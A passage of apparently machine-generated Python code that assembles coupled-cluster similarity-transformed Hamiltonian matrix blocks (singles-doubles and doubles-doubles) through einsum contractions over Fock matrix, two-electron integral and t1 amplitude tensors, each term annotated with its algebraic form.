Hds += 1.000000000000000 * einsum('ea,mi,kjbc,bj,cn,fk->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 3), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(n,i)*<k,j||b,c>*t1(b,j)*t1(c,m)*t1(e,k)
Hds += 1.000000000000000 * einsum('fa,ni,kjbc,bj,cm,ek->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 3), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(n,i)*<k,j||b,c>*t1(b,j)*t1(c,m)*t1(f,k)
Hds += -1.000000000000000 * einsum('ea,ni,kjbc,bj,cm,fk->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 3), (0, 2), (0, 1)])
# 1.0000 d(f,a)*<i,j||b,c>*t1(b,n)*t1(c,m)*t1(e,j)
Hds += 1.000000000000000 * einsum('fa,ijbc,bn,cm,ej->efmnai', kd[v, v], g[o, o, v, v], t1, t1, t1, optimize=['einsum_path', (1, 2), (1, 3), (1, 2), (0, 1)])
# -1.0000 d(e,a)*<i,j||b,c>*t1(b,n)*t1(c,m)*t1(f,j)
Hds += -1.000000000000000 * einsum('ea,ijbc,bn,cm,fj->efmnai', kd[v, v], g[o, o, v, v], t1, t1, t1, optimize=['einsum_path', (1, 2), (1, 3), (1, 2), (0, 1)])
# 1.0000 d(m,i)*<k,j||b,a>*t1(b,n)*t1(e,j)*t1(f,k)
Hds += 1.000000000000000 * einsum('mi,kjba,bn,ej,fk->efmnai', kd[o, o], g[o, o, v, v], t1, t1, t1, optimize=['einsum_path', (1, 2), (1, 3), (1, 2), (0, 1)])
# -1.0000 d(n,i)*<k,j||b,a>*t1(b,m)*t1(e,j)*t1(f,k)
Hds += -1.000000000000000 * einsum('ni,kjba,bm,ej,fk->efmnai', kd[o, o], g[o, o, v, v], t1, t1, t1, optimize=['einsum_path', (1, 2), (1, 3), (1, 2), (0, 1)])
# H(m,n,e,f;i,j,a,b) = <0|e2(m,n,f,e) e(-T) H e(T) e2(a,b,j,i)|0>
# 1.0000 d(e,a)*d(f,b)*d(n,j)*d(m,i)*f(k,k)
Hdd = 1.000000000000000 * einsum('ea,fb,nj,mi,kk->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], f[o, o], optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(f,b)*d(m,j)*d(n,i)*f(k,k)
Hdd += -1.000000000000000 * einsum('ea,fb,mj,ni,kk->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], f[o, o], optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(e,b)*d(n,j)*d(m,i)*f(k,k)
Hdd += -1.000000000000000 * einsum('fa,eb,nj,mi,kk->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], f[o, o], optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(e,b)*d(m,j)*d(n,i)*f(k,k)
Hdd += 1.000000000000000 * einsum('fa,eb,mj,ni,kk->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], f[o, o], optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(f,b)*d(m,i)*f(j,n)
Hdd += -1.000000000000000 * einsum('ea,fb,mi,jn->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, o], optimize=['einsum_path', (0, 1, 2, 3)])
# 1.0000 d(e,a)*d(f,b)*d(m,j)*f(i,n)
Hdd += 1.000000000000000 * einsum('ea,fb,mj,in->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, o], optimize=['einsum_path', (0, 1, 2, 3)])
# 1.0000 d(f,a)*d(e,b)*d(m,i)*f(j,n)
Hdd += 1.000000000000000 * einsum('fa,eb,mi,jn->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, o], optimize=['einsum_path', (0, 1, 2, 3)])
# -1.0000 d(f,a)*d(e,b)*d(m,j)*f(i,n)
Hdd += -1.000000000000000 * einsum('fa,eb,mj,in->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, o], optimize=['einsum_path', (0, 1, 2, 3)])
# 1.0000 d(e,a)*d(f,b)*d(n,i)*f(j,m)
Hdd += 1.000000000000000 * einsum('ea,fb,ni,jm->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, o], optimize=['einsum_path', (0, 1, 2, 3)])
# -1.0000 d(e,a)*d(f,b)*d(n,j)*f(i,m)
Hdd += -1.000000000000000 * einsum('ea,fb,nj,im->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, o], optimize=['einsum_path', (0, 1, 2, 3)])
# -1.0000 d(f,a)*d(e,b)*d(n,i)*f(j,m)
Hdd += -1.000000000000000 * einsum('fa,eb,ni,jm->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, o], optimize=['einsum_path', (0, 1, 2, 3)])
# 1.0000 d(f,a)*d(e,b)*d(n,j)*f(i,m)
Hdd += 1.000000000000000 * einsum('fa,eb,nj,im->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, o], optimize=['einsum_path', (0, 1, 2, 3)])
# 1.0000 d(f,b)*d(n,j)*d(m,i)*f(e,a)
Hdd += 1.000000000000000 * einsum('fb,nj,mi,ea->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[v, v], optimize=['einsum_path', (0, 1, 2, 3)])
# -1.0000 d(f,b)*d(m,j)*d(n,i)*f(e,a)
Hdd += -1.000000000000000 * einsum('fb,mj,ni,ea->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[v, v], optimize=['einsum_path', (0, 1, 2, 3)])
# -1.0000 d(f,a)*d(n,j)*d(m,i)*f(e,b)
Hdd += -1.000000000000000 * einsum('fa,nj,mi,eb->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[v, v], optimize=['einsum_path', (0, 1, 2, 3)])
# 1.0000 d(f,a)*d(m,j)*d(n,i)*f(e,b)
Hdd += 1.000000000000000 * einsum('fa,mj,ni,eb->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[v, v], optimize=['einsum_path', (0, 1, 2, 3)])
# -1.0000 d(e,b)*d(n,j)*d(m,i)*f(f,a)
Hdd += -1.000000000000000 * einsum('eb,nj,mi,fa->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[v, v], optimize=['einsum_path', (0, 1, 2, 3)])
# 1.0000 d(e,b)*d(m,j)*d(n,i)*f(f,a)
Hdd += 1.000000000000000 * einsum('eb,mj,ni,fa->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[v, v], optimize=['einsum_path', (0, 1, 2, 3)])
# 1.0000 d(e,a)*d(n,j)*d(m,i)*f(f,b)
Hdd += 1.000000000000000 * einsum('ea,nj,mi,fb->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[v, v], optimize=['einsum_path', (0, 1, 2, 3)])
# -1.0000 d(e,a)*d(m,j)*d(n,i)*f(f,b)
Hdd += -1.000000000000000 * einsum('ea,mj,ni,fb->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[v, v], optimize=['einsum_path', (0, 1, 2, 3)])
# 1.0000 d(e,a)*d(f,b)*d(n,j)*d(m,i)*f(k,c)*t1(c,k)
Hdd += 1.000000000000000 * einsum('ea,fb,nj,mi,kc,ck->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (2, 3), (0, 3), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(f,b)*d(m,j)*d(n,i)*f(k,c)*t1(c,k)
Hdd += -1.000000000000000 * einsum('ea,fb,mj,ni,kc,ck->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (2, 3), (0, 3), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(e,b)*d(n,j)*d(m,i)*f(k,c)*t1(c,k)
Hdd += -1.000000000000000 * einsum('fa,eb,nj,mi,kc,ck->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (2, 3), (0, 3), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(e,b)*d(m,j)*d(n,i)*f(k,c)*t1(c,k)
Hdd += 1.000000000000000 * einsum('fa,eb,mj,ni,kc,ck->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (2, 3), (0, 3), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(f,b)*d(m,i)*f(j,c)*t1(c,n)
Hdd += -1.000000000000000 * einsum('ea,fb,mi,jc,cn->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(f,b)*d(m,j)*f(i,c)*t1(c,n)
Hdd += 1.000000000000000 * einsum('ea,fb,mj,ic,cn->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(e,b)*d(m,i)*f(j,c)*t1(c,n)
Hdd += 1.000000000000000 * einsum('fa,eb,mi,jc,cn->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(e,b)*d(m,j)*f(i,c)*t1(c,n)
Hdd += -1.000000000000000 * einsum('fa,eb,mj,ic,cn->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(f,b)*d(n,i)*f(j,c)*t1(c,m)
Hdd += 1.000000000000000 * einsum('ea,fb,ni,jc,cm->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(f,b)*d(n,j)*f(i,c)*t1(c,m)
Hdd += -1.000000000000000 * einsum('ea,fb,nj,ic,cm->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(e,b)*d(n,i)*f(j,c)*t1(c,m)
Hdd += -1.000000000000000 * einsum('fa,eb,ni,jc,cm->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(e,b)*d(n,j)*f(i,c)*t1(c,m)
Hdd += 1.000000000000000 * einsum('fa,eb,nj,ic,cm->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(f,b)*d(n,j)*d(m,i)*f(k,a)*t1(e,k)
Hdd += -1.000000000000000 * einsum('fb,nj,mi,ka,ek->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(f,b)*d(m,j)*d(n,i)*f(k,a)*t1(e,k)
Hdd += 1.000000000000000 * einsum('fb,mj,ni,ka,ek->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(n,j)*d(m,i)*f(k,b)*t1(e,k)
Hdd += 1.000000000000000 * einsum('fa,nj,mi,kb,ek->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(m,j)*d(n,i)*f(k,b)*t1(e,k)
Hdd += -1.000000000000000 * einsum('fa,mj,ni,kb,ek->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(e,b)*d(n,j)*d(m,i)*f(k,a)*t1(f,k)
Hdd += 1.000000000000000 * einsum('eb,nj,mi,ka,fk->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(e,b)*d(m,j)*d(n,i)*f(k,a)*t1(f,k)
Hdd += -1.000000000000000 * einsum('eb,mj,ni,ka,fk->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(n,j)*d(m,i)*f(k,b)*t1(f,k)
Hdd += -1.000000000000000 * einsum('ea,nj,mi,kb,fk->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(m,j)*d(n,i)*f(k,b)*t1(f,k)
Hdd += 1.000000000000000 * einsum('ea,mj,ni,kb,fk->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -0.5000 d(e,a)*d(f,b)*d(n,j)*d(m,i)*<l,k||l,k>
Hdd += -0.500000000000000 * einsum('ea,fb,nj,mi,lklk->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], g[o, o, o, o], optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# 0.5000 d(e,a)*d(f,b)*d(m,j)*d(n,i)*<l,k||l,k>
Hdd += 0.500000000000000 * einsum('ea,fb,mj,ni,lklk->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], g[o, o, o, o], optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# 0.5000 d(f,a)*d(e,b)*d(n,j)*d(m,i)*<l,k||l,k>
Hdd += 0.500000000000000 * einsum('fa,eb,nj,mi,lklk->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], g[o, o, o, o], optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# -0.5000 d(f,a)*d(e,b)*d(m,j)*d(n,i)*<l,k||l,k>
Hdd += -0.500000000000000 * einsum('fa,eb,mj,ni,lklk->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], g[o, o, o, o], optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(f,b)*<i,j||m,n>
Hdd += 1.000000000000000 * einsum('ea,fb,ijmn->efmnabij', kd[v, v], kd[v, v], g[o, o, o, o], optimize=['einsum_path', (0, 1, 2)])
# -1.0000 d(f,a)*d(e,b)*<i,j||m,n>
Hdd += -1.000000000000000 * einsum('fa,eb,ijmn->efmnabij', kd[v, v], kd[v, v], g[o, o, o, o], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(f,b)*d(m,i)*<j,e||a,n>
Hdd += 1.000000000000000 * einsum('fb,mi,jean->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# -1.0000 d(f,b)*d(m,j)*<i,e||a,n>
Hdd += -1.000000000000000 * einsum('fb,mj,iean->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# -1.0000 d(f,a)*d(m,i)*<j,e||b,n>
Hdd += -1.000000000000000 * einsum('fa,mi,jebn->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(f,a)*d(m,j)*<i,e||b,n>
Hdd += 1.000000000000000 * einsum('fa,mj,iebn->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# -1.0000 d(f,b)*d(n,i)*<j,e||a,m>
Hdd += -1.000000000000000 * einsum('fb,ni,jeam->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(f,b)*d(n,j)*<i,e||a,m>
Hdd += 1.000000000000000 * einsum('fb,nj,ieam->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(f,a)*d(n,i)*<j,e||b,m>
Hdd += 1.000000000000000 * einsum('fa,ni,jebm->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# -1.0000 d(f,a)*d(n,j)*<i,e||b,m>
Hdd += -1.000000000000000 * einsum('fa,nj,iebm->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# -1.0000 d(e,b)*d(m,i)*<j,f||a,n>
Hdd += -1.000000000000000 * einsum('eb,mi,jfan->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(e,b)*d(m,j)*<i,f||a,n>
Hdd += 1.000000000000000 * einsum('eb,mj,ifan->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(e,a)*d(m,i)*<j,f||b,n>
Hdd += 1.000000000000000 * einsum('ea,mi,jfbn->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# -1.0000 d(e,a)*d(m,j)*<i,f||b,n>
Hdd += -1.000000000000000 * einsum('ea,mj,ifbn->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(e,b)*d(n,i)*<j,f||a,m>
Hdd += 1.000000000000000 * einsum('eb,ni,jfam->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# -1.0000 d(e,b)*d(n,j)*<i,f||a,m>
Hdd += -1.000000000000000 * einsum('eb,nj,ifam->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# -1.0000 d(e,a)*d(n,i)*<j,f||b,m>
Hdd += -1.000000000000000 * einsum('ea,ni,jfbm->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(e,a)*d(n,j)*<i,f||b,m>
Hdd += 1.000000000000000 * einsum('ea,nj,ifbm->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(n,j)*d(m,i)*<e,f||a,b>
Hdd += 1.000000000000000 * einsum('nj,mi,efab->efmnabij', kd[o, o], kd[o, o], g[v, v, v, v], optimize=['einsum_path', (0, 1, 2)])
# -1.0000 d(m,j)*d(n,i)*<e,f||a,b>
Hdd += -1.000000000000000 * einsum('mj,ni,efab->efmnabij', kd[o, o], kd[o, o], g[v, v, v, v], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(e,a)*d(f,b)*d(m,i)*<j,k||c,n>*t1(c,k)
Hdd += 1.000000000000000 * einsum('ea,fb,mi,jkcn,ck->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(f,b)*d(m,j)*<i,k||c,n>*t1(c,k)
Hdd += -1.000000000000000 * einsum('ea,fb,mj,ikcn,ck->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(e,b)*d(m,i)*<j,k||c,n>*t1(c,k)
Hdd += -1.000000000000000 * einsum('fa,eb,mi,jkcn,ck->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(e,b)*d(m,j)*<i,k||c,n>*t1(c,k)
Hdd += 1.000000000000000 * einsum('fa,eb,mj,ikcn,ck->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 P(m,n)d(e,a)*d(f,b)*<i,j||c,n>*t1(c,m)
contracted_intermediate = 1.000000000000000 * einsum('ea,fb,ijcn,cm->efmnabij', kd[v, v], kd[v, v], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
Hdd += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnabij->efnmabij', contracted_intermediate)
# -1.0000 P(m,n)d(f,a)*d(e,b)*<i,j||c,n>*t1(c,m)
contracted_intermediate = -1.000000000000000 * einsum('fa,eb,ijcn,cm->efmnabij', kd[v, v], kd[v, v], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
Hdd += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnabij->efnmabij', contracted_intermediate)
# -1.0000 d(f,b)*d(m,i)*<j,k||a,n>*t1(e,k)
Hdd += -1.000000000000000 * einsum('fb,mi,jkan,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,b)*d(m,j)*<i,k||a,n>*t1(e,k)
Hdd += 1.000000000000000 * einsum('fb,mj,ikan,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,a)*d(m,i)*<j,k||b,n>*t1(e,k)
Hdd += 1.000000000000000 * einsum('fa,mi,jkbn,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,a)*d(m,j)*<i,k||b,n>*t1(e,k)
Hdd += -1.000000000000000 * einsum('fa,mj,ikbn,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,b)*d(m,i)*<j,k||a,n>*t1(f,k)
Hdd += 1.000000000000000 * einsum('eb,mi,jkan,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,b)*d(m,j)*<i,k||a,n>*t1(f,k)
Hdd += -1.000000000000000 * einsum('eb,mj,ikan,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,a)*d(m,i)*<j,k||b,n>*t1(f,k)
Hdd += -1.000000000000000 * einsum('ea,mi,jkbn,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,a)*d(m,j)*<i,k||b,n>*t1(f,k)
Hdd += 1.000000000000000 * einsum('ea,mj,ikbn,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,a)*d(f,b)*d(n,i)*<j,k||c,m>*t1(c,k)
Hdd += -1.000000000000000 * einsum('ea,fb,ni,jkcm,ck->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(f,b)*d(n,j)*<i,k||c,m>*t1(c,k)
Hdd += 1.000000000000000 * einsum('ea,fb,nj,ikcm,ck->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(e,b)*d(n,i)*<j,k||c,m>*t1(c,k)
Hdd += 1.000000000000000 * einsum('fa,eb,ni,jkcm,ck->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(e,b)*d(n,j)*<i,k||c,m>*t1(c,k)
Hdd += -1.000000000000000 * einsum('fa,eb,nj,ikcm,ck->efmnabij', kd[v, v], kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(f,b)*d(n,i)*<j,k||a,m>*t1(e,k)
Hdd += 1.000000000000000 * einsum('fb,ni,jkam,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,b)*d(n,j)*<i,k||a,m>*t1(e,k)
Hdd += -1.000000000000000 * einsum('fb,nj,ikam,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,a)*d(n,i)*<j,k||b,m>*t1(e,k)
Hdd += -1.000000000000000 * einsum('fa,ni,jkbm,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,a)*d(n,j)*<i,k||b,m>*t1(e,k)
Hdd += 1.000000000000000 * einsum('fa,nj,ikbm,ek->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,b)*d(n,i)*<j,k||a,m>*t1(f,k)
Hdd += -1.000000000000000 * einsum('eb,ni,jkam,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,b)*d(n,j)*<i,k||a,m>*t1(f,k)
Hdd += 1.000000000000000 * einsum('eb,nj,ikam,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,a)*d(n,i)*<j,k||b,m>*t1(f,k)
Hdd += 1.000000000000000 * einsum('ea,ni,jkbm,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,a)*d(n,j)*<i,k||b,m>*t1(f,k)
Hdd += -1.000000000000000 * einsum('ea,nj,ikbm,fk->efmnabij', kd[v, v], kd[o, o], g[o, o, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,b)*d(n,j)*d(m,i)*<k,e||c,a>*t1(c,k)
Hdd += 1.000000000000000 * einsum('fb,nj,mi,keca,ck->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(f,b)*d(m,j)*d(n,i)*<k,e||c,a>*t1(c,k)
Hdd += -1.000000000000000 * einsum('fb,mj,ni,keca,ck->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(n,j)*d(m,i)*<k,e||c,b>*t1(c,k)
Hdd += -1.000000000000000 * einsum('fa,nj,mi,kecb,ck->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(m,j)*d(n,i)*<k,e||c,b>*t1(c,k)
Hdd += 1.000000000000000 * einsum('fa,mj,ni,kecb,ck->efmnabij', kd[v, v], kd[o, o], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(f,b)*d(m,i)*<j,e||c,a>*t1(c,n)
Hdd += -1.000000000000000 * einsum('fb,mi,jeca,cn->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,b)*d(m,j)*<i,e||c,a>*t1(c,n)
Hdd += 1.000000000000000 * einsum('fb,mj,ieca,cn->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,a)*d(m,i)*<j,e||c,b>*t1(c,n)
Hdd += 1.000000000000000 * einsum('fa,mi,jecb,cn->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,a)*d(m,j)*<i,e||c,b>*t1(c,n)
Hdd += -1.000000000000000 * einsum('fa,mj,iecb,cn->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,b)*d(n,i)*<j,e||c,a>*t1(c,m)
Hdd += 1.000000000000000 * einsum('fb,ni,jeca,cm->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,b)*d(n,j)*<i,e||c,a>*t1(c,m)
Hdd += -1.000000000000000 * einsum('fb,nj,ieca,cm->efmnabij', kd[v, v], kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
